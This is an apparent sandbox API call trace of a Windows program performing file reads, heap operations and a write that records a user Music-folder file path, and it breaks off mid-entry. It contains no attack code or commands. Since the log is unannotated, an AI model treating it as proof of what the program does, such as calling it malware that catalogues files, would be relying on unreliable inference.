[0187.378] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0187.378] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0187.378] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0187.378] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0187.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0187.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0187.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0187.378] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0187.378] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0187.379] ReadFile (in: hFile=0x138, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x2779, lpOverlapped=0x0) returned 1 [0187.379] ReadFile (in: hFile=0x138, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0187.379] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x2779, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0187.379] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0187.379] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0187.379] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0187.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0187.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0187.379] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\X4YFdz60f6cKTl.flyingship.wav\r\n", cchWideChar=105, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 105 [0187.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x69) returned 0x906f38 [0187.379] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\X4YFdz60f6cKTl.flyingship.wav\r\n", cchWideChar=105, lpMultiByteStr=0x906f38, cbMultiByte=105, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\X4YFdz60f6cKTl.flyingship.wav\r\n", lpUsedDefaultChar=0x0) returned 105 [0187.379] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0187.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x8fecd8 [0187.380] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0187.380] WriteFile (in: hFile=0x138, lpBuffer=0x8fecd8*, nNumberOfBytesToWrite=0x68, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x8fecd8*, lpNumberOfBytesWritten=0x87f43c*=0x68, lpOverlapped=0x0) returned 1 [0187.380] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fecd8 | out: hHeap=0x8a0000) returned 1 [0187.380] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0187.380] CloseHandle (hObject=0x138) returned 1 [0187.381] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0187.381] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0187.381] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0187.381] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0187.381] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0187.381] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0187.381] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0187.381] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0187.381] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fff00 | out: hHeap=0x8a0000) returned 1 [0187.383] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0187.383] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0187.383] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0187.383] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0187.383] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0187.383] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0187.383] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0187.383] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0187.383] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0187.383] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0187.383] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0187.383] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0187.383] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c3478 | out: hHeap=0x8a0000) returned 1 [0187.383] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0187.383] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0187.383] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0187.383] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0187.383] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0187.383] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0187.383] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0187.384] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0187.384] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0187.384] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0187.384] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0187.384] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0187.384] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0187.384] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0187.384] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0187.384] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0187.384] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0187.384] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0187.384] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0187.384] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0187.384] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0187.384] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0187.384] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0187.384] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0187.384] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0187.384] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0187.384] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0187.384] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0187.384] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0187.384] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0187.384] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0187.384] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0187.384] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0187.385] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0187.385] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0187.385] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0187.385] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0187.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0187.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0187.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0187.385] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0187.385] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0187.385] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0187.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0187.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1900 [0187.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0187.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0187.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0187.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0187.385] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0187.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0187.385] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0187.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd330 [0187.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0187.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0187.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0187.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0187.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0187.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0187.386] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0187.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0187.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0187.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0187.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0187.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0187.386] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0187.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0187.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0187.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0187.386] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0187.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0187.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0187.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0187.386] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0187.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0187.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0187.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0187.386] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0187.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0187.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0187.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0187.387] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0187.387] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0187.387] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0187.387] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0187.387] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0187.387] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0187.387] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0187.387] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0187.387] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0187.387] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0187.387] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0187.387] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0187.387] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0187.387] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0187.387] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0187.387] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0187.387] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0187.387] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0187.387] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0187.387] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0187.387] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0187.387] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0187.387] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0187.387] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0187.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0187.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0187.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0187.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0187.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0187.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0187.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0187.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0187.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0187.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0187.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0187.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0187.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0187.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0187.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0187.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0187.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0187.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0187.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0187.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0187.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0187.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0187.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0187.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0187.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0187.389] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0187.389] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0187.389] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0187.389] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c00 [0187.389] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0187.389] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0187.389] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0187.389] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0187.389] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0187.389] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0187.389] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0187.389] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0187.389] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0187.389] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0187.389] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0187.389] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0187.389] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0187.389] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0187.389] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0187.389] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0187.389] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0187.389] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0187.389] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0187.389] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0187.389] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0187.390] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0187.390] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0187.390] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0187.390] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0187.390] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0187.390] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0187.390] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0187.390] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0187.390] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0187.390] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0187.390] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0187.390] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0187.390] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0187.390] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0187.390] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0187.390] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0187.390] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0187.390] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0187.390] 